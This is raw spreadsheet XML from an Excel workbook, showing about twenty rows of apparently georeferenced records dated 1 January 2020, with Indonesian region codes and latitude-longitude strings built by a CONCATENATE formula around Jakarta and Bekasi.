</sst>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21" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="11" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapTex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442F0-EEBC-425B-8173-10E610A67910}">
  <dimension ref="A1:Y4204"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="L1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A4185" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="Y1" sqref="Y1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="10.140625" customWidth="1"/>
    <col min="2" max="2" width="14" customWidth="1"/>
    <col min="10" max="10" width="9.140625" customWidth="1"/>
    <col min="21" max="21" width="11.5703125" style="5" customWidth="1"/>
    <col min="22" max="22" width="11.140625" style="5" customWidth="1"/>
    <col min="23" max="23" width="16.5703125" style="5" customWidth="1"/>
    <col min="24" max="24" width="17.42578125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2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s="5" t="s">
        <v>20</v>
      </c>
      <c r="V1" s="5" t="s">
        <v>14428</v>
      </c>
      <c r="W1" s="5" t="s">
        <v>21</v>
      </c>
      <c r="X1" s="5" t="s">
        <v>14429</v>
      </c>
      <c r="Y1" s="5" t="s">
        <v>21999</v>
      </c>
    </row>
    <row r="2" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2">
        <v>94941</v>
      </c>
      <c r="B2" s="1">
        <v>43831</v>
      </c>
      <c r="C2" s="2">
        <v>2.1064814814814813E-3</v>
      </c>
      <c r="D2" t="s">
        <v>22</v>
      </c>
      <c r="E2" t="s">
        <v>23</v>
      </c>
      <c r="F2" t="s">
        <v>24</v>
      </c>
      <c r="G2" t="s">
        <v>25</v>
      </c>
      <c r="H2" t="s">
        <v>26</v>
      </c>
      <c r="I2" t="s">
        <v>27</v>
      </c>
      <c r="J2" t="s">
        <v>28</v>
      </c>
      <c r="L2" t="s">
        <v>29</v>
      </c>
      <c r="M2">
        <v>3174020005</v>
      </c>
      <c r="N2">
        <v>3174020</v>
      </c>
      <c r="O2">
        <v>3174</v>
      </c>
      <c r="P2">
        <v>31</v>
      </c>
      <c r="Q2" t="s">
        <v>30</v>
      </c>
      <c r="R2" t="s">
        <v>31</v>
      </c>
      <c r="S2" t="s">
        <v>32</v>
      </c>
      <c r="T2" t="s">
        <v>33</v>
      </c>
      <c r="U2" s="5">
        <v>10676866</v>
      </c>
      <c r="V2" s="5" t="s">
        <v>14453</v>
      </c>
      <c r="W2" s="5">
        <v>-616978</v>
      </c>
      <c r="X2" t="s">
        <v>18266</v>
      </c>
      <c r="Y2" t="str">
        <f>CONCATENATE(X2,",",V2)</f>
        <v>-6.16978,106.76866</v>
      </c>
    </row>
    <row r="3" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3">
        <v>95061</v>
      </c>
      <c r="B3" s="1">
        <v>43831</v>
      </c>
      <c r="C3" s="2">
        <v>2.988425925925926E-2</v>
      </c>
      <c r="D3" t="s">
        <v>22</v>
      </c>
      <c r="E3" t="s">
        <v>23</v>
      </c>
      <c r="F3" t="s">
        <v>34</v>
      </c>
      <c r="G3" t="s">
        <v>35</v>
      </c>
      <c r="H3" t="s">
        <v>26</v>
      </c>
      <c r="I3" t="s">
        <v>36</v>
      </c>
      <c r="J3" t="s">
        <v>37</v>
      </c>
      <c r="L3" t="s">
        <v>38</v>
      </c>
      <c r="M3">
        <v>3275061004</v>
      </c>
      <c r="N3">
        <v>3275061</v>
      </c>
      <c r="O3">
        <v>3275</v>
      </c>
      <c r="P3">
        <v>32</v>
      </c>
      <c r="Q3" t="s">
        <v>39</v>
      </c>
      <c r="R3" t="s">
        <v>40</v>
      </c>
      <c r="S3" t="s">
        <v>41</v>
      </c>
      <c r="T3" t="s">
        <v>42</v>
      </c>
      <c r="U3" s="5">
        <v>10697870</v>
      </c>
      <c r="V3" s="5" t="s">
        <v>14454</v>
      </c>
      <c r="W3" s="5">
        <v>-617944</v>
      </c>
      <c r="X3" t="s">
        <v>18267</v>
      </c>
      <c r="Y3" t="str">
        <f t="shared" ref="Y3:Y66" si="0">CONCATENATE(X3,",",V3)</f>
        <v>-6.17944,106.97870</v>
      </c>
    </row>
    <row r="4" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4">
        <v>95062</v>
      </c>
      <c r="B4" s="1">
        <v>43831</v>
      </c>
      <c r="C4" s="2">
        <v>5.2002314814814814E-2</v>
      </c>
      <c r="D4" t="s">
        <v>22</v>
      </c>
      <c r="E4" t="s">
        <v>23</v>
      </c>
      <c r="F4" t="s">
        <v>43</v>
      </c>
      <c r="H4" t="s">
        <v>26</v>
      </c>
      <c r="I4" t="s">
        <v>44</v>
      </c>
      <c r="J4" t="s">
        <v>45</v>
      </c>
      <c r="L4" t="s">
        <v>46</v>
      </c>
      <c r="M4">
        <v>3172060004</v>
      </c>
      <c r="N4">
        <v>3172060</v>
      </c>
      <c r="O4">
        <v>3172</v>
      </c>
      <c r="P4">
        <v>31</v>
      </c>
      <c r="Q4" t="s">
        <v>47</v>
      </c>
      <c r="R4" t="s">
        <v>48</v>
      </c>
      <c r="S4" t="s">
        <v>49</v>
      </c>
      <c r="T4" t="s">
        <v>33</v>
      </c>
      <c r="U4" s="5">
        <v>10689100</v>
      </c>
      <c r="V4" s="5" t="s">
        <v>14455</v>
      </c>
      <c r="W4" s="5">
        <v>-623449</v>
      </c>
      <c r="X4" t="s">
        <v>18268</v>
      </c>
      <c r="Y4" t="str">
        <f t="shared" si="0"/>
        <v>-6.23449,106.89100</v>
      </c>
    </row>
    <row r="5" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A5">
        <v>95063</v>
      </c>
      <c r="B5" s="1">
        <v>43831</v>
      </c>
      <c r="C5" s="2">
        <v>5.2175925925925924E-2</v>
      </c>
      <c r="D5" t="s">
        <v>22</v>
      </c>
      <c r="E5" t="s">
        <v>23</v>
      </c>
      <c r="F5" t="s">
        <v>50</v>
      </c>
      <c r="G5" t="s">
        <v>51</v>
      </c>
      <c r="H5" t="s">
        <v>26</v>
      </c>
      <c r="I5" t="s">
        <v>52</v>
      </c>
      <c r="J5" t="s">
        <v>37</v>
      </c>
      <c r="L5" t="s">
        <v>53</v>
      </c>
      <c r="M5">
        <v>3216061004</v>
      </c>
      <c r="N5">
        <v>3216061</v>
      </c>
      <c r="O5">
        <v>3216</v>
      </c>
      <c r="P5">
        <v>32</v>
      </c>
      <c r="Q5" t="s">
        <v>54</v>
      </c>
      <c r="R5" t="s">
        <v>55</v>
      </c>
      <c r="S5" t="s">
        <v>41</v>
      </c>
      <c r="T5" t="s">
        <v>42</v>
      </c>
      <c r="U5" s="5">
        <v>10716189</v>
      </c>
      <c r="V5" s="5" t="s">
        <v>14456</v>
      </c>
      <c r="W5" s="5">
        <v>-630170</v>
      </c>
      <c r="X5" t="s">
        <v>18269</v>
      </c>
      <c r="Y5" t="str">
        <f t="shared" si="0"/>
        <v>-6.30170,107.16189</v>
      </c>
    </row>
    <row r="6" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A6">
        <v>95064</v>
      </c>
      <c r="B6" s="1">
        <v>43831</v>
      </c>
      <c r="C6" s="2">
        <v>5.4201388888888889E-2</v>
      </c>
      <c r="D6" t="s">
        <v>22</v>
      </c>
      <c r="E6" t="s">
        <v>23</v>
      </c>
      <c r="F6" t="s">
        <v>56</v>
      </c>
      <c r="G6" t="s">
        <v>57</v>
      </c>
      <c r="H6" t="s">
        <v>26</v>
      </c>
      <c r="I6" t="s">
        <v>58</v>
      </c>
      <c r="J6" t="s">
        <v>59</v>
      </c>
      <c r="M6">
        <v>3173060002</v>
      </c>
      <c r="N6">
        <v>3173060</v>
      </c>
      <c r="O6">
        <v>3173</v>
      </c>
      <c r="P6">
        <v>31</v>
      </c>
      <c r="Q6" t="s">
        <v>60</v>
      </c>
      <c r="R6" t="s">
        <v>61</v>
      </c>
      <c r="S6" t="s">
        <v>62</v>
      </c>
      <c r="T6" t="s">
        <v>33</v>
      </c>
      <c r="U6" s="5">
        <v>10686092</v>
      </c>
      <c r="V6" s="5" t="s">
        <v>14457</v>
      </c>
      <c r="W6" s="5">
        <v>-616859</v>
      </c>
      <c r="X6" t="s">
        <v>18270</v>
      </c>
      <c r="Y6" t="str">
        <f t="shared" si="0"/>
        <v>-6.16859,106.86092</v>
      </c>
    </row>
    <row r="7" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A7">
        <v>95065</v>
      </c>
      <c r="B7" s="1">
        <v>43831</v>
      </c>
      <c r="C7" s="2">
        <v>5.9050925925925923E-2</v>
      </c>
      <c r="D7" t="s">
        <v>22</v>
      </c>
      <c r="E7" t="s">
        <v>23</v>
      </c>
      <c r="F7" t="s">
        <v>63</v>
      </c>
      <c r="G7" t="s">
        <v>64</v>
      </c>
      <c r="H7" t="s">
        <v>26</v>
      </c>
      <c r="I7" t="s">
        <v>65</v>
      </c>
      <c r="J7" t="s">
        <v>66</v>
      </c>
      <c r="L7" t="s">
        <v>67</v>
      </c>
      <c r="M7">
        <v>3174010004</v>
      </c>
      <c r="N7">
        <v>3174010</v>
      </c>
      <c r="O7">
        <v>3174</v>
      </c>
      <c r="P7">
        <v>31</v>
      </c>
      <c r="Q7" t="s">
        <v>68</v>
      </c>
      <c r="R7" t="s">
        <v>69</v>
      </c>
      <c r="S7" t="s">
        <v>32</v>
      </c>
      <c r="T7" t="s">
        <v>33</v>
      </c>
      <c r="U7" s="5">
        <v>10673835</v>
      </c>
      <c r="V7" s="5" t="s">
        <v>14458</v>
      </c>
      <c r="W7" s="5">
        <v>-619933</v>
      </c>
      <c r="X7" t="s">
        <v>18271</v>
      </c>
      <c r="Y7" t="str">
        <f t="shared" si="0"/>
        <v>-6.19933,106.73835</v>
      </c>
    </row>
    <row r="8" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A8">
        <v>95066</v>
      </c>
      <c r="B8" s="1">
        <v>43831</v>
      </c>
      <c r="C8" s="2">
        <v>6.5266203703703715E-2</v>
      </c>
      <c r="D8" t="s">
        <v>22</v>
      </c>
      <c r="E8" t="s">
        <v>23</v>
      </c>
      <c r="F8" t="s">
        <v>70</v>
      </c>
      <c r="G8" t="s">
        <v>71</v>
      </c>
      <c r="H8" t="s">
        <v>26</v>
      </c>
      <c r="I8" t="s">
        <v>72</v>
      </c>
      <c r="J8" t="s">
        <v>37</v>
      </c>
      <c r="L8" t="s">
        <v>73</v>
      </c>
      <c r="M8">
        <v>3275061004</v>
      </c>
      <c r="N8">
        <v>3275061</v>
      </c>
      <c r="O8">
        <v>3275</v>
      </c>
      <c r="P8">
        <v>32</v>
      </c>
      <c r="Q8" t="s">
        <v>39</v>
      </c>
      <c r="R8" t="s">
        <v>40</v>
      </c>
      <c r="S8" t="s">
        <v>41</v>
      </c>
      <c r="T8" t="s">
        <v>42</v>
      </c>
      <c r="U8" s="5">
        <v>10698668</v>
      </c>
      <c r="V8" s="5" t="s">
        <v>14459</v>
      </c>
      <c r="W8" s="5">
        <v>-618996</v>
      </c>
      <c r="X8" t="s">
        <v>18272</v>
      </c>
      <c r="Y8" t="str">
        <f t="shared" si="0"/>
        <v>-6.18996,106.98668</v>
      </c>
    </row>
    <row r="9" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A9">
        <v>95067</v>
      </c>
      <c r="B9" s="1">
        <v>43831</v>
      </c>
      <c r="C9" s="2">
        <v>7.1608796296296295E-2</v>
      </c>
      <c r="D9" t="s">
        <v>22</v>
      </c>
      <c r="E9" t="s">
        <v>23</v>
      </c>
      <c r="F9" t="s">
        <v>74</v>
      </c>
      <c r="G9" t="s">
        <v>75</v>
      </c>
      <c r="H9" t="s">
        <v>26</v>
      </c>
      <c r="I9" t="s">
        <v>76</v>
      </c>
      <c r="J9" t="s">
        <v>77</v>
      </c>
      <c r="M9">
        <v>3174010004</v>
      </c>
      <c r="N9">
        <v>3174010</v>
      </c>
      <c r="O9">
        <v>3174</v>
      </c>
      <c r="P9">
        <v>31</v>
      </c>
      <c r="Q9" t="s">
        <v>68</v>
      </c>
      <c r="R9" t="s">
        <v>69</v>
      </c>
      <c r="S9" t="s">
        <v>32</v>
      </c>
      <c r="T9" t="s">
        <v>33</v>
      </c>
      <c r="U9" s="5">
        <v>10674001</v>
      </c>
      <c r="V9" s="5" t="s">
        <v>14460</v>
      </c>
      <c r="W9" s="5">
        <v>-619439</v>
      </c>
      <c r="X9" t="s">
        <v>18273</v>
      </c>
      <c r="Y9" t="str">
        <f t="shared" si="0"/>
        <v>-6.19439,106.74001</v>
      </c>
    </row>
    <row r="10" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A10">
        <v>95068</v>
      </c>
      <c r="B10" s="1">
        <v>43831</v>
      </c>
      <c r="C10" s="2">
        <v>8.7222222222222215E-2</v>
      </c>
      <c r="D10" t="s">
        <v>22</v>
      </c>
      <c r="E10" t="s">
        <v>23</v>
      </c>
      <c r="F10" t="s">
        <v>78</v>
      </c>
      <c r="G10" t="s">
        <v>79</v>
      </c>
      <c r="H10" t="s">
        <v>26</v>
      </c>
      <c r="I10" t="s">
        <v>80</v>
      </c>
      <c r="J10" t="s">
        <v>81</v>
      </c>
      <c r="L10" t="s">
        <v>82</v>
      </c>
      <c r="M10">
        <v>3174070001</v>
      </c>
      <c r="N10">
        <v>3174070</v>
      </c>
      <c r="O10">
        <v>3174</v>
      </c>
      <c r="P10">
        <v>31</v>
      </c>
      <c r="Q10" t="s">
        <v>83</v>
      </c>
      <c r="R10" t="s">
        <v>84</v>
      </c>
      <c r="S10" t="s">
        <v>32</v>
      </c>
      <c r="T10" t="s">
        <v>33</v>
      </c>
      <c r="U10" s="5">
        <v>10672181</v>
      </c>
      <c r="V10" s="5" t="s">
        <v>14461</v>
      </c>
      <c r="W10" s="5">
        <v>-616777</v>
      </c>
      <c r="X10" t="s">
        <v>18274</v>
      </c>
      <c r="Y10" t="str">
        <f t="shared" si="0"/>
        <v>-6.16777,106.72181</v>
      </c>
    </row>
    <row r="11" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A11">
        <v>95069</v>
      </c>
      <c r="B11" s="1">
        <v>43831</v>
      </c>
      <c r="C11" s="2">
        <v>8.6504629629629626E-2</v>
      </c>
      <c r="D11" t="s">
        <v>85</v>
      </c>
      <c r="E11" t="s">
        <v>23</v>
      </c>
      <c r="F11" t="s">
        <v>86</v>
      </c>
      <c r="G11" t="s">
        <v>87</v>
      </c>
      <c r="H11" t="s">
        <v>26</v>
      </c>
      <c r="J11" t="s">
        <v>37</v>
      </c>
      <c r="K11" t="s">
        <v>88</v>
      </c>
      <c r="L11" t="s">
        <v>89</v>
      </c>
      <c r="M11">
        <v>3275061004</v>
      </c>
      <c r="N11">
        <v>3275061</v>
      </c>
      <c r="O11">
        <v>3275</v>
      </c>
      <c r="P11">
        <v>32</v>
      </c>
      <c r="Q11" t="s">
        <v>39</v>
      </c>
      <c r="R11" t="s">
        <v>40</v>
      </c>
      <c r="S11" t="s">
        <v>41</v>
      </c>
      <c r="T11" t="s">
        <v>42</v>
      </c>
      <c r="U11" s="5">
        <v>10699478</v>
      </c>
      <c r="V11" s="5" t="s">
        <v>14462</v>
      </c>
      <c r="W11" s="5">
        <v>-618322</v>
      </c>
      <c r="X11" t="s">
        <v>18275</v>
      </c>
      <c r="Y11" t="str">
        <f t="shared" si="0"/>
        <v>-6.18322,106.99478</v>
      </c>
    </row>
    <row r="12" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A12">
        <v>95097</v>
      </c>
      <c r="B12" s="1">
        <v>43831</v>
      </c>
      <c r="C12" s="2">
        <v>9.1458333333333322E-2</v>
      </c>
      <c r="D12" t="s">
        <v>22</v>
      </c>
      <c r="E12" t="s">
        <v>23</v>
      </c>
      <c r="F12" t="s">
        <v>90</v>
      </c>
      <c r="G12" t="s">
        <v>91</v>
      </c>
      <c r="H12" t="s">
        <v>26</v>
      </c>
      <c r="I12" t="s">
        <v>92</v>
      </c>
      <c r="J12" t="s">
        <v>93</v>
      </c>
      <c r="L12" t="s">
        <v>94</v>
      </c>
      <c r="M12">
        <v>3174020007</v>
      </c>
      <c r="N12">
        <v>3174020</v>
      </c>
      <c r="O12">
        <v>3174</v>
      </c>
      <c r="P12">
        <v>31</v>
      </c>
      <c r="Q12" t="s">
        <v>95</v>
      </c>
      <c r="R12" t="s">
        <v>31</v>
      </c>
      <c r="S12" t="s">
        <v>32</v>
      </c>
      <c r="T12" t="s">
        <v>33</v>
      </c>
      <c r="U12" s="5">
        <v>10676476</v>
      </c>
      <c r="V12" s="5" t="s">
        <v>14463</v>
      </c>
      <c r="W12" s="5">
        <v>-616204</v>
      </c>
      <c r="X12" t="s">
        <v>18276</v>
      </c>
      <c r="Y12" t="str">
        <f t="shared" si="0"/>
        <v>-6.16204,106.76476</v>
      </c>
    </row>
    <row r="13" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A13">
        <v>95137</v>
      </c>
      <c r="B13" s="1">
        <v>43831</v>
      </c>
      <c r="C13" s="2">
        <v>9.7870370370370371E-2</v>
      </c>
      <c r="D13" t="s">
        <v>22</v>
      </c>
      <c r="E13" t="s">
        <v>23</v>
      </c>
      <c r="F13" t="s">
        <v>96</v>
      </c>
      <c r="G13" t="s">
        <v>97</v>
      </c>
      <c r="H13" t="s">
        <v>26</v>
      </c>
      <c r="I13" t="s">
        <v>65</v>
      </c>
      <c r="J13" t="s">
        <v>37</v>
      </c>
      <c r="L13" t="s">
        <v>98</v>
      </c>
      <c r="M13">
        <v>3275040007</v>
      </c>
      <c r="N13">
        <v>3275040</v>
      </c>
      <c r="O13">
        <v>3275</v>
      </c>
      <c r="P13">
        <v>32</v>
      </c>
      <c r="Q13" t="s">
        <v>99</v>
      </c>
      <c r="R13" t="s">
        <v>100</v>
      </c>
      <c r="S13" t="s">
        <v>41</v>
      </c>
      <c r="T13" t="s">
        <v>42</v>
      </c>
      <c r="U13" s="5">
        <v>10702225</v>
      </c>
      <c r="V13" s="5" t="s">
        <v>14464</v>
      </c>
      <c r="W13" s="5">
        <v>-623895</v>
      </c>
      <c r="X13" t="s">
        <v>18277</v>
      </c>
      <c r="Y13" t="str">
        <f t="shared" si="0"/>
        <v>-6.23895,107.02225</v>
      </c>
    </row>
    <row r="14" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A14">
        <v>95160</v>
      </c>
      <c r="B14" s="1">
        <v>43831</v>
      </c>
      <c r="C14" s="2">
        <v>9.2824074074074073E-2</v>
      </c>
      <c r="D14" t="s">
        <v>85</v>
      </c>
      <c r="E14" t="s">
        <v>23</v>
      </c>
      <c r="F14" t="s">
        <v>101</v>
      </c>
      <c r="G14" t="s">
        <v>102</v>
      </c>
      <c r="H14" t="s">
        <v>26</v>
      </c>
      <c r="I14" t="s">
        <v>103</v>
      </c>
      <c r="J14" t="s">
        <v>104</v>
      </c>
      <c r="K14" t="s">
        <v>105</v>
      </c>
      <c r="L14" t="s">
        <v>106</v>
      </c>
      <c r="M14">
        <v>3171100008</v>
      </c>
      <c r="N14">
        <v>3171100</v>
      </c>
      <c r="O14">
        <v>3171</v>
      </c>
      <c r="P14">
        <v>31</v>
      </c>
      <c r="Q14" t="s">
        <v>107</v>
      </c>
      <c r="R14" t="s">
        <v>107</v>
      </c>
      <c r="S14" t="s">
        <v>108</v>
      </c>
      <c r="T14" t="s">
        <v>33</v>
      </c>
      <c r="U14" s="5">
        <v>10682927</v>
      </c>
      <c r="V14" s="5" t="s">
        <v>14465</v>
      </c>
      <c r="W14" s="5">
        <v>-620840</v>
      </c>
      <c r="X14" t="s">
        <v>18278</v>
      </c>
      <c r="Y14" t="str">
        <f t="shared" si="0"/>
        <v>-6.20840,106.82927</v>
      </c>
    </row>
    <row r="15" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A15">
        <v>95241</v>
      </c>
      <c r="B15" s="1">
        <v>43831</v>
      </c>
      <c r="C15" s="2">
        <v>0.10776620370370371</v>
      </c>
      <c r="D15" t="s">
        <v>22</v>
      </c>
      <c r="E15" t="s">
        <v>23</v>
      </c>
      <c r="F15" t="s">
        <v>109</v>
      </c>
      <c r="G15" t="s">
        <v>110</v>
      </c>
      <c r="H15" t="s">
        <v>26</v>
      </c>
      <c r="I15" t="s">
        <v>111</v>
      </c>
      <c r="J15" t="s">
        <v>37</v>
      </c>
      <c r="L15" t="s">
        <v>112</v>
      </c>
      <c r="M15">
        <v>3275060002</v>
      </c>
      <c r="N15">
        <v>3275060</v>
      </c>
      <c r="O15">
        <v>3275</v>
      </c>
      <c r="P15">
        <v>32</v>
      </c>
      <c r="Q15" t="s">
        <v>113</v>
      </c>
      <c r="R15" t="s">
        <v>114</v>
      </c>
      <c r="S15" t="s">
        <v>41</v>
      </c>
      <c r="T15" t="s">
        <v>42</v>
      </c>
      <c r="U15" s="5">
        <v>10695966</v>
      </c>
      <c r="V15" s="5" t="s">
        <v>14466</v>
      </c>
      <c r="W15" s="5">
        <v>-622251</v>
      </c>
      <c r="X15" t="s">
        <v>18279</v>
      </c>
      <c r="Y15" t="str">
        <f t="shared" si="0"/>
        <v>-6.22251,106.95966</v>
      </c>
    </row>
    <row r="16" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A16">
        <v>95531</v>
      </c>
      <c r="B16" s="1">
        <v>43831</v>
      </c>
      <c r="C16" s="2">
        <v>0.13155092592592593</v>
      </c>
      <c r="D16" t="s">
        <v>22</v>
      </c>
      <c r="E16" t="s">
        <v>23</v>
      </c>
      <c r="F16" t="s">
        <v>115</v>
      </c>
      <c r="G16" t="s">
        <v>116</v>
      </c>
      <c r="H16" t="s">
        <v>26</v>
      </c>
      <c r="I16" t="s">
        <v>117</v>
      </c>
      <c r="J16" t="s">
        <v>118</v>
      </c>
      <c r="L16" t="s">
        <v>119</v>
      </c>
      <c r="M16">
        <v>3171070001</v>
      </c>
      <c r="N16">
        <v>3171070</v>
      </c>
      <c r="O16">
        <v>3171</v>
      </c>
      <c r="P16">
        <v>31</v>
      </c>
      <c r="Q16" t="s">
        <v>120</v>
      </c>
      <c r="R16" t="s">
        <v>121</v>
      </c>
      <c r="S16" t="s">
        <v>108</v>
      </c>
      <c r="T16" t="s">
        <v>33</v>
      </c>
      <c r="U16" s="5">
        <v>10681001</v>
      </c>
      <c r="V16" s="5" t="s">
        <v>14467</v>
      </c>
      <c r="W16" s="5">
        <v>-625791</v>
      </c>
      <c r="X16" t="s">
        <v>18280</v>
      </c>
      <c r="Y16" t="str">
        <f t="shared" si="0"/>
        <v>-6.25791,106.81001</v>
      </c>
    </row>
    <row r="17" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A17">
        <v>95536</v>
      </c>
      <c r="B17" s="1">
        <v>43831</v>
      </c>
      <c r="C17" s="2">
        <v>0.13208333333333333</v>
      </c>
      <c r="D17" t="s">
        <v>22</v>
      </c>
      <c r="E17" t="s">
        <v>23</v>
      </c>
      <c r="F17" t="s">
        <v>122</v>
      </c>
      <c r="G17" t="s">
        <v>123</v>
      </c>
      <c r="H17" t="s">
        <v>26</v>
      </c>
      <c r="I17" t="s">
        <v>124</v>
      </c>
      <c r="J17" t="s">
        <v>125</v>
      </c>
      <c r="L17" t="s">
        <v>126</v>
      </c>
      <c r="M17">
        <v>3172070001</v>
      </c>
      <c r="N17">
        <v>3172070</v>
      </c>
      <c r="O17">
        <v>3172</v>
      </c>
      <c r="P17">
        <v>31</v>
      </c>
      <c r="Q17" t="s">
        <v>127</v>
      </c>
      <c r="R17" t="s">
        <v>128</v>
      </c>
      <c r="S17" t="s">
        <v>49</v>
      </c>
      <c r="T17" t="s">
        <v>33</v>
      </c>
      <c r="U17" s="5">
        <v>10689524</v>
      </c>
      <c r="V17" s="5" t="s">
        <v>14468</v>
      </c>
      <c r="W17" s="5">
        <v>-624017</v>
      </c>
      <c r="X17" t="s">
        <v>18281</v>
      </c>
      <c r="Y17" t="str">
        <f t="shared" si="0"/>
        <v>-6.24017,106.89524</v>
      </c>
    </row>
    <row r="18" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A18">
        <v>95555</v>
      </c>
      <c r="B18" s="1">
        <v>43831</v>
      </c>
      <c r="C18" s="2">
        <v>0.13587962962962963</v>
      </c>
      <c r="D18" t="s">
        <v>22</v>
      </c>
      <c r="E18" t="s">
        <v>23</v>
      </c>
      <c r="F18" t="s">
        <v>129</v>
      </c>
      <c r="G18" t="s">
        <v>130</v>
      </c>
      <c r="H18" t="s">
        <v>26</v>
      </c>
      <c r="I18" t="s">
        <v>131</v>
      </c>
      <c r="J18" t="s">
        <v>37</v>
      </c>
      <c r="L18" t="s">
        <v>132</v>
      </c>
      <c r="M18">
        <v>3275041004</v>
      </c>
      <c r="N18">
        <v>3275041</v>
      </c>
      <c r="O18">
        <v>3275</v>
      </c>
      <c r="P18">
        <v>32</v>
      </c>
      <c r="Q18" t="s">
        <v>133</v>
      </c>
      <c r="R18" t="s">
        <v>134</v>
      </c>
      <c r="S18" t="s">
        <v>41</v>
      </c>
      <c r="T18" t="s">
        <v>42</v>
      </c>
      <c r="U18" s="5">
        <v>10700423</v>
      </c>
      <c r="V18" s="5" t="s">
        <v>14469</v>
      </c>
      <c r="W18" s="5">
        <v>-626413</v>
      </c>
      <c r="X18" t="s">
        <v>18282</v>
      </c>
      <c r="Y18" t="str">
        <f t="shared" si="0"/>
        <v>-6.26413,107.00423</v>
      </c>
    </row>
    <row r="19" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A19">
        <v>95567</v>
      </c>
      <c r="B19" s="1">
        <v>43831</v>
      </c>
      <c r="C19" s="2">
        <v>0.13855324074074074</v>
      </c>
      <c r="D19" t="s">
        <v>22</v>
      </c>
      <c r="E19" t="s">
        <v>23</v>
      </c>
      <c r="F19" t="s">
        <v>135</v>
      </c>
      <c r="G19" t="s">
        <v>136</v>
      </c>
      <c r="H19" t="s">
        <v>26</v>
      </c>
      <c r="I19" t="s">
        <v>137</v>
      </c>
      <c r="J19" t="s">
        <v>138</v>
      </c>
      <c r="L19" t="s">
        <v>139</v>
      </c>
      <c r="M19">
        <v>3172080005</v>
      </c>
      <c r="N19">
        <v>3172080</v>
      </c>
      <c r="O19">
        <v>3172</v>
      </c>
      <c r="P19">
        <v>31</v>
      </c>
      <c r="Q19" t="s">
        <v>140</v>
      </c>
      <c r="R19" t="s">
        <v>141</v>
      </c>
      <c r="S19" t="s">
        <v>49</v>
      </c>
      <c r="T19" t="s">
        <v>33</v>
      </c>
      <c r="U19" s="5">
        <v>10695063</v>
      </c>
      <c r="V19" s="5" t="s">
        <v>14470</v>
      </c>
      <c r="W19" s="5">
        <v>-616994</v>
      </c>
      <c r="X19" t="s">
        <v>18283</v>
      </c>
      <c r="Y19" t="str">
        <f t="shared" si="0"/>
        <v>-6.16994,106.95063</v>
      </c>
    </row>
    <row r="20" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A20">
        <v>95581</v>
      </c>
      <c r="B20" s="1">
        <v>43831</v>
      </c>
      <c r="C20" s="2">
        <v>0.14061342592592593</v>
      </c>
      <c r="D20" t="s">
        <v>22</v>
      </c>
      <c r="E20" t="s">
        <v>23</v>
      </c>
      <c r="F20" t="s">
        <v>142</v>
      </c>
      <c r="G20" t="s">
        <v>143</v>
      </c>
      <c r="H20" t="s">
        <v>26</v>
      </c>
      <c r="I20" t="s">
        <v>144</v>
      </c>
      <c r="J20" t="s">
        <v>37</v>
      </c>
      <c r="L20" t="s">
        <v>145</v>
      </c>
      <c r="M20">
        <v>3275060003</v>
      </c>
      <c r="N20">
        <v>3275060</v>
      </c>
      <c r="O20">
        <v>3275</v>
      </c>
      <c r="P20">
        <v>32</v>
      </c>
      <c r="Q20" t="s">
        <v>146</v>
      </c>
      <c r="R20" t="s">
        <v>114</v>
      </c>
      <c r="S20" t="s">
        <v>41</v>
      </c>
      <c r="T20" t="s">
        <v>42</v>
      </c>
      <c r="U20" s="5">
        <v>10698030</v>
      </c>
      <c r="V20" s="5" t="s">
        <v>14471</v>
      </c>
      <c r="W20" s="5">
        <v>-623027</v>
      </c>
      <c r="X20" t="s">
        <v>18284</v>
      </c>
      <c r="Y20" t="str">
        <f t="shared" si="0"/>
        <v>-6.23027,106.98030</v>
      </c>
    </row>
    <row r="21" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A21">
        <v>95592</v>
      </c>
      <c r="B21" s="1">
        <v>43831</v>
      </c>
      <c r="C21" s="2">
        <v>0.15328703703703703</v>
      </c>
      <c r="D21" t="s">
        <v>22</v>
      </c>
      <c r="E21" t="s">
        <v>23</v>
      </c>
      <c r="F21" t="s">
        <v>147</v>
      </c>
      <c r="G21" t="s">
        <v>148</v>
      </c>
      <c r="H21" t="s">
        <v>26</v>
      </c>
      <c r="I21" t="s">
        <v>149</v>
      </c>
      <c r="J21" t="s">
        <v>93</v>
      </c>
      <c r="L21" t="s">
        <v>150</v>
      </c>
      <c r="M21">
        <v>3174020007</v>
      </c>
      <c r="N21">
        <v>3174020</v>
      </c>
      <c r="O21">
        <v>3174</v>
      </c>
      <c r="P21">
        <v>31</v>
      </c>
      <c r="Q21" t="s">
        <v>95</v>
      </c>
      <c r="R21" t="s">
        <v>31</v>
      </c>
      <c r="S21" t="s">
        <v>32</v>
      </c>
      <c r="T21" t="s">
        <v>33</v>
      </c>
      <c r="U21" s="5">
        <v>10676545</v>
      </c>
      <c r="V21" s="5" t="s">
        <v>14472</v>
      </c>
      <c r="W21" s="5">
        <v>-616260</v>
      </c>
      <c r="X21" t="s">
